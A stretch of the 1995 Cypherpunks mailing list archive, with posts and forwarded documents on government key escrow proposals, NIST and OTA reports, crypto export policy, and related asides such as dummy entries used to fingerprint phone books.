iQCVAwUBMFPCmH3YhjZY3fMNAQEzTAP/dJFeg828BVuqS06deN15ILrX/13q2iSa seMCWXJMxOmRPS+oS7vbJtJ8jIhEJVlg+p9Un/rstD4QM7q6PRgKw9daq5LMav3y S+i0sYKEBnMmF+q5Ocm6EshHCAYs9sQOkM7hxr0rq0vhX3onFlpAIVBmUhz4BjtX YtoSpLWQ62U= =i8Zt -----END PGP SIGNATURE----- From tcmay at got.net Sun Sep 10 22:57:31 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 10 Sep 95 22:57:31 PDT Subject: GAK Advisory Board Message-ID: Thanks to "Anonymous" for sending this to us. I visited the site, http://csrc.ncsl.nist.gov/csspab, and there seem to be some interesting things there. At 4:50 AM 9/11/95, Anonymous wrote: >Status of Key Escrow Initiative > >Mr. Steve Walker, Trusted Information Systems (TIS), >briefed the Board on the status of Commercial Key Escrow >(CKE). He said, with regard to application vendors, TIS ... >Mr. Walker said the advantages of CKE for government >interests is that if the TIS CKE system were to become >widely used throughout the private sector and government >communities, law enforcement, national security and >private sector interests would be preserved. If Data Recovery Centers are indeed completely choosable by the users, as certain statements by TIS folks have asserted, then how would "law enforcement" and "national security" interests be "preserved"? (I can tell you that BlackNet won't be using any government-approved DRCs. Nor will Kizer Sose be using any registered and licensed DRCs. If people are free to pick DRCs--the only option a free society can support--the results are obvious.) Note also the emphasis on "throughout the private sector and government communities" as leading to this protection of law enforcement and national security interests...no mention of this being mainly for export issues...the focus seems to be on domestic use of CKE, with the "law enforcement" and "national security" needs "preserved." Sounds ominous to me. I've used "Tim's Really Flaky Commercial Key Escrow Service" as a placeholder for the kind of truly voluntary DRCs many of us would insist on. (Other examples: a computer on my LAN, the bit bucket, my neighbor, my lawyer, my bank in Lichtenstein, etc. Some of these are actually what I would want to use. I can imagine interesting situations wherein attorney-client privilege blocks access to the keys.) So, what's the story? Is Steve Walker of TIS supporting the kind of completely voluntary CKE system that Carl Ellison has advocated? Or a mandatory system? (A third imaginable possibility is "a system which is so universally popular that it becomes universally used"...unlikely in the extreme, as I know of at least a few people who won't use it, and expect others to bypass it when they learn what the Feds can do. But I expect that the advocates of the mandatory option will cite this possibility, as a way of sugar-coating the proposal. Then, if this option fails (to preserve the Government's interests!), watch for registration of DRCs.) I met Steve Walker once, at the CFP Conference, and he seemed genuinely interested in selling to citizens a voluntary system. But his comments to the Privacy Advisory Board seem to imply a CKE system that would not be completely voluntary in the operation (licensing, registering. auditing) of Data Recovery Centers. If this is the case, then alternatives to the TIS system will likely gain more adherents from folks like us. >Mr. Walker said that TIS has filed for patent protection >for its Software Key Escrow (Clipper equivalent) and CKE >systems including the DRC and application software >approaches. TIS is prepared to license its CKE system >and software applications technology to any software or >hardware vendor under very favorable licensing terms. >TIS is also prepared to license its DRC system and >technology to qualified DRC operators and vendors under >similarly favorable licensing terms. (See Reference >#13). The TIS system may be patented, but it seems to me that the older ideas of Shamir secret sharing are not. And even simpler schemes of sealing parts of keys in several envelopes... (My point is that older ideas of using crypto in conjunction with emergency recovery systems are still usable, and have been talked about for many years, long before the TIS disclosures.) I hope it doesn't come to this. I hope TIS releases or licenses on very general terms, with no government control of the DRCs. If not, I predict their system will be subject to derision, and worse. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From nobody at REPLAY.COM Sun Sep 10 23:00:20 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 10 Sep 95 23:00:20 PDT Subject: GAK Advisory Board 94 Message-ID: <199509110600.IAA03045@utopia.hacktic.nl> >From URL: http://csrc.ncsl.nist.gov/csspab/94-rpt.txt Executive Summary This Annual Report documents activities of the National Computer System Security and Privacy Advisory Board during 1994, its sixth year. During the year, the Board continued to review cryptography related issues. During 1994, the Escrowed Encryption Standard (EES) and the Digital Signature Standard (DSS) were approved as Federal Information Processing Standards (FIPS 185) and (FIPS 186) respectively. The Board heard briefings on escrowing release procedures, escrow program procedures, U.S. export procedures, international cryptography proposals, international corporate key escrow, alternative key escrow approaches, and software-based key escrow encryption. The Board also continued to follow activities related to the Common Criteria (CC), which remains in draft form. [Comments on the CC will be reviewed and processed in March 1995.] The Board continued to examine the question as to whether there is a business case for setting up a Trusted Technology Assessment Program (TTAP). Membership Currently, Dr. Willis H. Ware, a senior researcher of the Corporate Research Staff of RAND, serves as Chairman of the Board. He was appointed in July 1989. As of December 1994, the membership of the Board is as follows: - Chairman Willis H. Ware, RAND - Federal Members Charlie C. Baggett, Jr. National Security Agency Henry H. Philcox, Department of the Treasury, Internal Revenue Service Cynthia C. Rand, Department of Transportation Stephen A. Trodden, Department of Veterans Affairs - Non-Federal, Non-Vendor Genevieve M. Burns, Monsanto Corporation (Member Designate) Cris R. Castro, KPMG Peat Marwick Sandra Lambert, Citibank Randolph Sanovic, Mobil Corporation (Member Designate) - Non-Federal, Vendor Gaetano Gangemi, Wang Laboratories, Inc. Linda Vetter, Oracle Corporation (Member Designate) Stephen T. Walker, Trusted Information Systems, Inc. Bill Whitehurst, International Business Machines Corp. In December of 1994, Ms. Cynthia Rand resigned from the Board, leaving a vacancy in the federal member category. II. Major Issues Discussed The work of the Board during 1994 was devoted to various topics related to security of federal unclassified automated information systems. Among the most important were: - Cryptographic Key Escrowing Procedures - Alternative Key Escrow - Security in the National Information Infrastructure (NII) Escrowing Release/Program Procedures The Department of Justice briefed the Board on procedures for release of cryptographic key components, by the two escrow agents, to government agencies. The two escrow agents at the National Institute of Standards and Technology (NIST), of the Department of Commerce and the Automated Systems Division of the Department of Treasury. The agents act under strict procedures to ensure the security of the key components and which govern their release for use in conjunction with lawful wiretaps. NIST discussed the procedures for the key escrow program. Five federal agencies share a role in the key escrow program: (1) the Department of Justice is a sponsor and a family key agent that holds one of the components of the family key, (2) the Federal Bureau of Investigation is the initial law enforcement user and a family key agent that holds the other component of the family key, (3) NIST has a dual role as the program manager and a key escrow agent, (4) the Department of Treasury is a key escrow agent; and (5) the National Security Agency is the system developer that provides technical assistance. Alternative Key Escrow Bankers Trust presented some rationales for key escrow encryption for corporations, which fulfills management supervision and compliance duties, and reduces business risks. They maintain that the Bankers Trust system can meet both U.S. and European needs. Their system has been discussed with Canada, Britain, France, Singapore, and the U.S.; however, none of these countries have endorsed the system. Trusted Information Systems, Inc. gave a demonstration and overview of their approach to software-based key escrow encryption. They said that software key escrow systems could be built that meet the objectives of law enforcement. Also, that variations of their software key escrow system can provide a commercial key escrow capability that will be very appealing to corporate and individual computer users. They believe that widespread use of corporate key escrow, in which corporations operate their own key escrow centers, and individual key escrow, in which bonded commercial key escrow centers provide a key retrieval capability for registered users, will better achieve the key escrow objectives of law enforcement than a government-operated key escrow system. [Snip 180kb of very informative docs on the main US cryptography issues of 1994, still alive in '95.] From hal9001 at panix.com Sun Sep 10 23:30:38 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Sun, 10 Sep 95 23:30:38 PDT Subject: Internet commerce mtg, Denver Message-ID: At 13:00 9/9/95, Vladimir Z. Nuri wrote: >the rep told me something interesting: he said that every >Bell phone book is actually "seeded" with dummy names >so they can detect copyright infringers. if you come out >with a business directory, these Bells will just scan for >the fake names that they have inserted into their own listings. >if they find them, supposedly they can show them to a copyright >judge and he will immediately close down your operation and >fine you, almost no questions asked. I didn't know how much >of this really happens (the legal stuff sounded questionable >to me) but it is an interesting "real world" instance of >copyright terrorism prevention that the "information liberation >front" would have to contend with. This is standard practice with (snailmail) mailing lists. When you buy a ome-time-use mailing list, there are always names in there to detect resale or reuse of the list. There are people whose job it is to scan the junk mail they get and report when they get mail to specifically encoded names (which would indicate that the mailing list has been reused or merged with another list without permission). I see nothing wrong with doing something similar with Phone Books (and I seem to remember reading that has been done in the past). From rmtodd at servalan.servalan.com Mon Sep 11 00:28:30 1995 From: rmtodd at servalan.servalan.com (Richard Todd) Date: Mon, 11 Sep 95 00:28:30 PDT Subject: Document Fingerprinting In-Reply-To: <199509110443.WAA00476@wero.byu.edu> Message-ID: In servalan.mailinglist.cypherpunks you write: >I seem to recall a lawsuit where somebody like Tandy was suing >somebody else, claiming they copied the computer's rom code. >As proof they pulled out the competitors computer, pressed a >certain key combination, and the Tandy copyright flashed up on >the screen. As I also recall, they LOST the suit believe it or >not... Dunno about that one, but there was one where Tandy/Radio Shack was being sued by the guy (Randy Cook) who originally wrote TRSDOS 2.1, claiming RS owed him royalties (which they weren't paying) because the current shipping TRSDOS for the Mod I at the time (v2.3) still had Randy's code. RS claimed otherwise. Randy Cook showed that if you held down two keys while booting TRSDOS 2.3, (either the '2' and '4' keys, or '2' and '6', I forget which), instead of going into the OS the machine would show a nice copyright screen, including "Copyright (C) Randy Cook". Oops. Tandy/RS had to pay up. (For those who still have a working Model I and a copy of TRSDOS from that era, the message is located in one of the sectors on Track 0; it's fairly easy to spot with a sector editor like SUPERZAP...) There was also the famous Apple/Franklin case, where Apple showed that Franklin's Apple II clones contained the original Apple II ROMs, right down to the copyright notice. From stewarts at ix.netcom.com Mon Sep 11 00:35:31 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 11 Sep 95 00:35:31 PDT Subject: Big machine ordered from Intel Message-ID: <199509110735.AAA01275@ix4.ix.netcom.com> At 08:40 AM 9/8/95 -0700, Patrick wrote: >How much you want to bet that a first copy goes to virginia? >> NY Times, Sept 8, 1995. >> Intel Wins Contract to Develop World's Fastest >> Supercomputer >> San Francisco, Sept. 7 -- The Intel Corporation said >> today that it had won a a contract from the Department of >> Energy to develop what it called the world's fastest >> supercomputer. ... >> The machine, to be built at an estimated cost of $45 >> million, would use 9,000 of Intel's forthcoming P6 >> microprocessors linked in a configuration known as Not likely. It's the kind of machine Sandia _would_ use, especially since they seem to be getting good support for nuclear-related boondoggles even after the demise of the Cold War, and it's also the kind of thing they could use for commercial applications if they lose their nuclear funding, or use to say "But we _need_ to keep funding this program, we haven't yet gotten our money's worth out of this big expensive computer", etc. Also, the cost is roughly $5K/processor, which is probably more than you'd need to build a MPP key-cracker, which doesn't need as much interaction between processors. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From karlmarx at ix.netcom.com Mon Sep 11 00:43:04 1995 From: karlmarx at ix.netcom.com (Ethan Lindsey) Date: Mon, 11 Sep 95 00:43:04 PDT Subject: Voice Encryption Message-ID: <199509110742.AAA17689@ix5.ix.netcom.com> A friend of mine recently told me that Phil Zimmerman was distributing a voice encryption program over the 'net. I dismissed his comment thinking he was probably just confused and thinking about PGP. Lately though, I've been wondering if he was right. Does anyone know of any voice cryptology program that encrypts voice throught a modem connection? Thanx... ethan From damion.furi at the-matrix.com Mon Sep 11 02:11:24 1995 From: damion.furi at the-matrix.com (DAMION FURI) Date: Mon, 11 Sep 95 02:11:24 PDT Subject: question about reputa In-Reply-To: <8B0D52F.000504EADD.uuout@the-matrix.com> Message-ID: <8B0E027.000504EC28.uuout@the-matrix.com> F|Adam Shostack writes: |# Good question, but a quick modification allows for effective |# bootstrapping. If I want to start consulting for Amalgameted |# Consolodated, I can offer them a 10 free questions deal to bootstrap |# things with. Mallet can only cheat if my offer was broadcast. F|Wei Dai writes: |> This scheme doesn't quite work. (Let's call Amalgameted Bob, to keep |> names short.) Bob can create a new, unlinkable pseudonym and give the same |> offer to Carol under the new pseudonym. Then, Bob acts as Mallet and |> passes messages back and forth between Alice and Carol. F|If all Alice's prospective customers are also resellers on the side, then I |agree that she has a problem. But how realistic is a market scenario in which |a new supplier cannot positively identify some legitimate end consumers of a |product or service ? (I'm ignoring cases in which the market for the |product or service is only just being forged.) This strikes me as rather |implausible, although I don't claim to have devoted a great deal of thought |to it. Hey, Wei, you overlooked something rather simple: suppose Alice wasn't any good? Or suppose she was good, in general, but came up wrong at a bad time? Whereas she might have corrected it in time if it had been her client and she had direct access, Mallet gets hit broadside out of ignorance-- and the resulting delay from the extra link in the chain could easily be enough to ruin him. :----------:----------:----------:----------:----------:----------:----- : furi at the-matrix.com | pgp-public-key at demon.co.uk | LIVE LION ALERT : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0 F7 E9 67 1F AF B8 2D 94 PGP: When it's none of their damned business. --- � SPEED 2.00 #2640 � From frissell at panix.com Mon Sep 11 02:48:08 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 11 Sep 95 02:48:08 PDT Subject: Digital Fingerprinting In-Reply-To: Message-ID: On Sun, 10 Sep 1995, Timothy C. May wrote: > If a piece of mail addressed to me is found littering the highway, can I be > convicted of littering? No, because the _provenance_ of that item of mail > cannot be determined...it might have accidentally blown out of a trash > truch delivering my mail to the dump, for example. I'm afraid that they are busting people in New York for recycling violations when they find mail addressed to them mixed in with household garbage in public trash cans. DCF From baum at world.std.com Mon Sep 11 03:44:17 1995 From: baum at world.std.com (Michael S Baum) Date: Mon, 11 Sep 95 03:44:17 PDT Subject: FYI Message-ID: From habs at warwick.com Mon Sep 11 04:03:33 1995 From: habs at warwick.com (Harry S. Hawk) Date: Mon, 11 Sep 95 04:03:33 PDT Subject: Internet commerce mtg, Denver In-Reply-To: Message-ID: <199509111101.HAA12452@cmyk.warwick.com> > I see nothing wrong with doing something similar with Phone Books (and I > seem to remember reading that has been done in the past). More than that it is completely legal (to type in such a book). Now back to cypherpunk topics /hawk -- Harry Hawk Manager of Computer Services Warwick Baker & Fiore 212 941 4438 habs at warwick.com From bart at netcom.com Mon Sep 11 05:50:46 1995 From: bart at netcom.com (Harry Bartholomew) Date: Mon, 11 Sep 95 05:50:46 PDT Subject: Information Security and Privacy in Network Environments (fwd) Message-ID: <199509111247.FAA00620@netcom16.netcom.com> This was posted to another list today. It purports to be fresh although the file at the Web site is dated 11 August. Hope this is not redundant. > * > U.S. CONGRESS > OFFICE OF TECHNOLOGY ASSESSMENT > Washington, DC 20510 > * > > * > ISSUE UPDATE ON INFORMATION SECURITY AND > PRIVACY IN NETWORK ENVIRONMENTS > * > > The OTA background paper "Issue Update on Information > Security and Privacy in Network Environments" is now > available. Ordering information and details about > electronic access are at the end of this file. > > INFORMATION SECURITY AND PRIVACY ISSUES IN NETWORK > ENVIRONMENTS REQUIRE CONGRESSIONAL ATTENTION > > Transition to a society that depends on electronic > information and network connectivity brings new concerns for > information security and effective protection of privacy. > The new focus must be on safeguarding information as it is > processed, stored, and transmitted, rather than on > "document" security or "computer" security. In the > networked society, responsibility for information security > is shifting to the end users. > > In a background paper released today the congressional > Office of Technology Assessment (OTA) finds an increasingly > urgent need for timely congressional attention to these > concerns. > > OTA has updated, at the request of the Senate Committee on > Governmental Affairs, some key issues identified in its 1994 > report on information security and privacy. OTA found that > recent and ongoing events are relevant to congressional > consideration of national cryptography policy and > government-wide guidance on safeguarding unclassified > information in federal agencies. > > OTA stresses the need for openness, oversight, and public > accountability--given the broad public and business impacts > of these policies--throughout the discussion of possible > congressional actions. In OTA's view, two key questions > underlie consideration of policy options. The first is: How > will the nation develop and maintain the balance among > traditional "national security" and law-enforcement > objectives and other aspects of the public interest, such as > economic vitality, civil liberties, and open government? > The second is: What are the costs of government efforts to > control cryptography and who will bear them? > > None of the cost estimates will be easy to make, warns OTA. > Ultimately, however, these costs are all borne by the > public, whether in the form of taxes, product prices, or > foregone economic opportunities and earnings. > > OTA emphasizes that congressional oversight of government > information security and privacy protection is of utmost > importance in the present time of government reform and > organizational streamlining. The security of unclassified > information has not been a top management priority; > downsizing can incur additional information security and > privacy risks. Similarly, says OTA, management must ensure > integration of safeguards when streamlining agency > operations and modernizing information systems > > OTA finds momentum building for government-wide consolidation > of information-security responsibilities. Congress must > resolve the overarching issue of where federal authority for > safeguarding unclassified information in the civilian > agencies should reside and, therefore, what needs > to be done concerning the substance and implementation of > the Computer Security Act of 1987, says OTA. If Congress retains the > general premise of the act--that responsibility for > unclassified information security in the civilian agencies > should not reside within the defense/intelligence > community--then vigilant oversight and clear direction will > be needed, says OTA. > > Timely and continuing congressional oversight of > cryptography policies is crucial, says OTA. Cryptography, a > fundamental safeguard, can preserve the confidentiality of > messages and files, or provide "digital signatures" that > will help speed the way to electronic commerce. Non- > governmental markets for cryptography-based safeguards have > grown over the past two decades, but are still developing. > Research is international; markets would be, says OTA, > except for governmental restrictions, such as export > controls that effectively create "domestic" and "export" > market segments for strong encryption products. > > Cryptography policies affect technological developments in > the field, as well as the health and economic vitality of > companies that produce or use products incorporating > cryptography, and consequently, the vitality of the > information technology industries and the everyday lives of > most Americans. But, business has strong and serious > concerns that government interests, especially with respect > to standards and export controls, could stifle commercial > development and use of networks in the international arena. > Given the broad public and business impacts, timely and > continuing congressional oversight of these policies is > crucial. > > Strong encryption is increasingly portrayed as a threat to > domestic security (public safety) and a barrier to law > enforcement if it is readily available for use by terrorists > or criminals. Thus, export controls, intended to restrict > the international availability of U.S. cryptography > technology and products, are now being joined with domestic > cryptography initiatives, like key-escrow encryption, that > are intended to preserve U.S. law-enforcement and signals- > intelligence capabilities. > > Public and business concerns surrounding the Clinton > Administration's escrowed-encryption initiative have not > been resolved, notes OTA. Many concerns focus on whether > government-approved, key-escrow encryption will become > mandatory for government agencies or the private sector, if > non-escrowed encryption will be banned, and/or if these > actions could be taken without legislation. Although the > Clinton Administration has stated that it has no plans to > make escrowed encryption mandatory, or to ban other forms of > encryption, OTA points out that, absent legislation, these > intentions are not binding. OTA concludes that escrowed- > encryption initiatives warrant congressional attention > because of the public funds that will be spent in deploying > them, and also because negative public perceptions of the > processes for developing and deploying encryption standards, > and of the standards themselves, may erode public confidence > and trust in government and the effectiveness of federal > leadership in promoting responsible use of information > safeguards. > > OTA is a nonpartisan analytical agency that serves the U.S. > Congress. Its purpose is to aid Congress with the complex > and often highly technical issues that increasingly affect > our society. > > ORDERING INFORMATION > > For copies of the 142-page background paper "Issue Update on > Information Security and Privacy in Network Environments" > for congressional use, please call (202) 224-9241. To order > copies for noncongressional use, call (202) 512-0132 (GPO's > main bookstore) or (202) 512-1800 and indicate stock number > 052-003-01416-5. Or send your check for $11.00 a copy or > provide your VISA or MasterCard number and expiration date > to Superintendent of Documents, P.O. Box 371954, Pittsburgh, > PA 15250-7974, [FAX (202) 512-2250]. Free 8-page summaries > are available electronically, and by calling (202) 224-8996. > > ELECTRONIC ACCESS > > Readers can access this background paper electronically > through OTA Online via the following standard Internet > tools: > > WWW: http://www.ota.gov > > FTP: otabbs.ota.gov; login as anonymous, password is your e- > mail address; publications are in the /pub directory > > Telnet: otabbs.ota.gov; login as public, password is public > > Additional features of OTA Online are available through > client software with a graphical user interface for > Microsoft Windows. This software is available free through > the WWW home page or by contacting the OTA > Telecommunications and Information Systems Office, (202) > 228-6000, or email sysop at ota.gov Direct questions or > comments on Internet services by email to netsupport at ota.gov > > From pfarrell at netcom.com Mon Sep 11 05:57:18 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Mon, 11 Sep 95 05:57:18 PDT Subject: Media coverage of NIST Export meetings? Message-ID: <32173.pfarrell@netcom.com> Has anyone seen any media coverage of last week's meetings? I haven't seen anything in either the Washington Post or the Wall Street Journal. Nothing on radio or local TV either. I don't expect much coverage, as Joe Sixpack has no knowledge of why he should be interested. But I expected at least a paragraph hidden somewhere inside. Perhaps I missed it. Anyone else seen any??? Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From grendel at netaxs.com Mon Sep 11 06:03:18 1995 From: grendel at netaxs.com (Michael Handler) Date: Mon, 11 Sep 95 06:03:18 PDT Subject: 64 bit crypto In-Reply-To: <199509110157.SAA01073@hammerhead.com> Message-ID: On Sun, 10 Sep 1995, Thaddeus J. Beier wrote: > Forgive a little bit of code... Hey. It's C. That's what this mailing list is about, right? ;-) > for(i = 0; i < 65536) { /* stir the pot a long time */ for (i = 0; i < 65536; i++) { /* stir the pot a long time */ Otherwise the loop will run a *long* time. Like infinity. :-) -- Michael Handler Philadelphia, PA Cypherpunks: Civil Liberty Through Complex Mathematics better living through cryptography From bianco at itribe.net Mon Sep 11 06:05:20 1995 From: bianco at itribe.net (David J. Bianco) Date: Mon, 11 Sep 95 06:05:20 PDT Subject: Cryptography Technical Report Server: Bad URL Message-ID: <199509111304.JAA04118@gatekeeper.itribe.net> My previous post about the Cryptography Technical Report Server (CTRS) contained a bad URL, so some of you who tried to access it recently weren't able to find it. My apologies. The problem has been fixed, though, so CTRS can now *really* be found at or We're upgrading our SPARC Webserver to a spiffy new Challenge-S, so not only should you now have no problem finding CTRS, but it should also respond pretty quickly. -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From jya at pipeline.com Mon Sep 11 06:17:00 1995 From: jya at pipeline.com (John Young) Date: Mon, 11 Sep 95 06:17:00 PDT Subject: NYT on GAK Message-ID: <199509111316.JAA02859@pipe2.nyc.pipeline.com> The New York Times, September 11, 1995, p. D7. Technology / Peter H. Lewis On The Net. Privacy for computers? Clinton sets the stage for a debate on data encryption. In terms of its ability to raise the nation's blood pressure, the debate over data encryption has not yet reached the same levels as gun control. But last week the Clinton Administration appeared to set the stage for an equally divisive debate over the degree to which businesses and individuals have the right to keep secrets when using telephones, computers and other forms of electronic communications. In two days of public hearings last week in Gaithersburg, Md., home of the National Institute of Standards and Technology, the Administration introduced its long-awaited proposals to relax restrictions on the export of cryptographic software. The Administration drew a line in the virtual sands of cyberspace, signaling that it is willing to permit Americans to put stronger cryptographic locks on their electronic data only if a spare key to those locks is made available on demand to law-enforcement agencies. There looms the conflict. Although the debate is about export controls the "export" issue is irrelevant in today's era of global electronic networks. Placing a common privacy program on an Internet computer in Austin, Tex., is effectively no different from sending a shrink-wrapped copy of the program to Moscow. The real issue is how much privacy the Government is willing to allow its own citizens, and the latest word from the Clinton Administration is that the right to electronic privacy, like the right to bear arms, is not absolute. Cryptography is the science of secret writing. In this digital era, it applies not just to notes, but also to telephone calls, money transfers, bank and credit card records, electronic mail, faxes and other computer files. The Clinton Administration's goal is to allow Americans to use the strongest possible cryptographic technology, while at the same time preserving the ability of law-enforcement agencies to perform court-authorized wiretaps as part of the effort to catch drug dealers, terrorists, child pornographers and other miscreants. In other words, it favors strong cryptography, but not too strong. The strength of cryptographic software is measured by the length of the software key necessary to encode and decode a message. The longer the key, the harder it is for an unauthorized user to decipher the message. In recent years, the Government has generally permitted Americans to export cryptographic software with key lengths up to 40 bits. Experts say that 40-bit keys are secure from casual snooping, but will fall quickly to a determined codebreaker. Last week, after more than a year of intense analysis, the Government introduced what it said was the best possible compromise. Under the new policy, companies can export encryption algorithms using 64-bit keys, which are much more secure, but only if spare keys are given to "escrow agents" who would make them available to lawenforcement agents under standard legal procedures, similar to legal wiretaps authorized by a judge. Otherwise, the 40-bit limit continues to apply. Such a "key escrow" scheme is anathema to many privacy advocates who fear Government abuses. The Government first proposed a key escrow system with its so-called Clipper Chip, a technology that failed to win acceptance even as a voluntary standard. The new scheme is somewhat more palatable than Clipper. Key escrow is still unpopular with American computer and software companies, which say it prevents them from competing against foreign companies that have no similar constraints, and with many multinational corporations, which say it prevents them from working with foreign companies that do not especially care for the idea of Uncle Sam holding the keys to their data banks. "If this was intended to be any sort of compromise, I don't think it achieved its end," said Whitfield Diffie, a Sun Microsystems enginePs who attended the meetings. "I didn't see anybody who was enthusiastic." Raymond G. Kammer, deputy director of N.l.S.T., suggested that the hearings last week were intended to elicit public comment, and that the Administration's final position on cryptographic policy were still under analysis. But the emergence of key escrow issues at the N.l.S.T. proceedings suggests that key escrow is emerging as a nonnegotiable demand by some factions of the Clinton Administration, especially the Justice Department and the Federal Bureau of Investigation, led by Louis Freeh. "If this fails," said a figure familiar with the Administration's thinking on the proposed change in cryptographic policy, "it's going to lead to a very divisive debate. And the irony, for libertarians who oppose key escrow, is that if it fails, I am convinced that Louis Freeh cannot be true to his job without proposing domestic controls on data encryption." "He's not going to give up without a fight, and neither is the Justice Department," said the figure, who spoke on the condition he not be identified. Others say they do not think the Clinton Administration has yet arrived at a concrete position, even after more than a year of study and debate. "I don't think it's a final offer," said John Gilmore, an engineer at Cygnus Support, a computer company in Mountain View, Calif. "It looks to me like a weak strawman, a first offer, a proposal to dance." The question is whether American citizens and businesses have the patience to wait for the music to start. And the issue may be moot, anyway because the Internet is no more controlled by the United States than is the United Nations. "The Internet Architecture Board has specifically decided to ignore export controls in designing the security infrastructure for the next generation of Internet protocols," Mr. Gilmore said. "The Internet of 1998 will provide automatic, secure, and fully private communication, without key escrow, internationally." In other words, the Internet community is already planning to jump over the new line in the sand drawn last week by the Administration. Cryptogrophy that is stronger than the Government's proposed system will be built into the Internet by a dozen countries, and American companies and individuals would be foolish not to use it. At that point, millions of Americans will come into direct conflict with Government policy, and the popular gun-control bumper sticker may be replaced by one that says "If cryptography is outlawed, only outlaws will have cryptography." [End] From ylo at cs.hut.fi Mon Sep 11 06:18:28 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Mon, 11 Sep 95 06:18:28 PDT Subject: Voice Encryption In-Reply-To: <199509110742.AAA17689@ix5.ix.netcom.com> Message-ID: <199509111315.QAA27696@shadows.cs.hut.fi> > A friend of mine recently told me that Phil Zimmerman was distributing > a voice encryption program over the 'net. I dismissed his comment > thinking he was probably There are several packages references in the software section of http://www.cs.hut.fi/crypto. It also contains links to ftp sites outside the United States. Tatu From nobody at REPLAY.COM Mon Sep 11 06:40:40 1995 From: nobody at REPLAY.COM (Anonymous) Date: Mon, 11 Sep 95 06:40:40 PDT Subject: Comp Sec Calendar Message-ID: <199509111339.PAA09319@utopia.hacktic.nl> >From URL: http://csrc.ncsl.nist.gov/events/eventcal.txt Last update: 07/24/95 COMPUTER SECURITY EVENTS CALENDAR This file contains a list of upcoming computer security events. The absence or inclusion of any particular event does not imply criticism or endorsement by the National Institute of Standards and Technology or the sysop. Because of the nature of this material and how it is obtained, it is impossible to include every event. If you know of computer security events that are not listed, please send the conference/course literature and requests to the following: Computer Security Resource Clearinghouse (Events Calendar) National Institute of Standards and Technology Room A-216, Bldg. 225 Gaithersburg, MD 20899 webmaster at csrc.ncsl.nist.gov [Snip sessions before 9/7] DATE: 09/07/95 TITLE: Information Warfare Conference (InfoWarCon) '95 LOCATION: Arlington, VA SPONSOR: National Computer Security Association (NCSA) CONTACT: National Computer Security Association ADDRESS: 10 S. Courthouse Ave. CITY_ST: Carlisle, PA 17013 PHONE: (717) 258-1816 DATE: 09/11/95 TITLE: ASIS 41st Annual Seminar & Exhibits LOCATION: New Orleans, LA SPONSOR: American Society for Industrial Security (ASIS) CONTACT: Society for Industrial Security ADDRESS: 1655 North Fort Myer Dr., Suite 1200 CITY_ST: Arlington, VA 22209 PHONE: (703) 522-5800 DATE: 09/11/95 - 09/13/95 TITLE: Exploring the Hostile Cyberspace LOCATION: Cleveland, OH SPONSOR: NASA Lewis Research Center, et al. CONTACT: New Dimensions International ADDRESS: P. O. Box 897 CITY_ST: Cardiff, CA 92007 PHONE: (619) 436-5618 DATE: 09/12/95 TITLE: COSAC '95 LOCATION: Dublin, Ireland SPONSOR: Republic of Ireland AKA Associates CONTACT: AKA Associates ADDRESS: 7 Darragh Road CITY_ST: Crossgar, Co. Down, BT30 9NP E-MAIL: cosac95 at ibm.net DATE: 09/14/95 TITLE: Network Security (LAN's Client/Server and the Internet) LOCATION: St. Louis, MO (other dates and locations available, call CSI) SPONSOR: CSI (Computer Security Institute) CONTACT: CSI ADDRESS: 600 Harrison Street CITY_ST: San Francisco, CA 94107 PHONE: (415) 905-2626 DATE: 09/17/95 TITLE: LISA 9th Systems Administration Conference LOCATION: Monterey California SPONSOR: USENIX, ACSTPA, SAGE CONTACT: USENIX Conference Office ADDRESS: 22672 Lambert Street, Suite 613 CITY_ST: Lake Forest, CA 92630 PHONE: (714) 588-8649 DATE: 09/18/95 TITLE: 7th Commputer Security Incident Handling Workshop LOCATION: Karlsuhe, Germany SPONSOR: CONTACT: Rechenzentrum Uni Karlsruhe, Herr Fischer ADDRESS: Zirkel 2 CITY_ST: D-76131 Karlsruhe, Germany PHONE: +49 721 376422 DATE: 9/20/95 TITLE: Acquisition Streamling and Information Warfare LOCATION: Koran Room, Ft. Myer Officers Club in Arlington, VA SPONSOR: CONTACT: ADDRESS: CITY_ST: Arlington, VA PRESENTER: Anthony Valletta, Deputy Assistant Secretary of Defense, C3I - Acqui sitions PHONE: (202) 828-1920 for info or reservations DATE: 10/10/95 TITLE: 18th National Information Systems Security Conference LOCATION: Baltimore, MD SPONSOR: NSA/NCSC and NIST/CSL CONTACT: Tammie Grice ADDRESS: NIST, Room A807, Bldg 101 CITY_ST: Gaithersburg, MD 20899 PHONE: (301) 975-3883 DATE: 10/19-20/95 LOCATION: Bethesda, MD SPONSOR: ABA, NIST, USCIB, ... CONTACT: Worldwide Electronic Commerce Conference '95 ADDRESS: PO Box 743485 CITY_ST: Dallas, TX 75374 PHONE: 214.516.4900 EMAIL: wec at multicorp.com URL: http://www.multicorp.com/wec DATE: 10/24/95 TITLE: The Business Recover Managers Symposium LOCATION: San Diego, CA SPONSOR: MIS Training Institute CONTACT: ADDRESS: 498 Concord Street CITY_ST: Framingham, MA 01701-2357 PHONE: (508) 879-7999 DATE: 11/06/95 TITLE: CSI's 22nd Annual Computer Security Conference LOCATION: Washington, D.C. SPONSOR: Computer Security Institute CONTACT: Computer Security Institute ADDRESS: 600 Harrison St. CITY_ST: San Francisco, CA 94107 PHONE: (415) 905-2626 DATE: 12/11/95 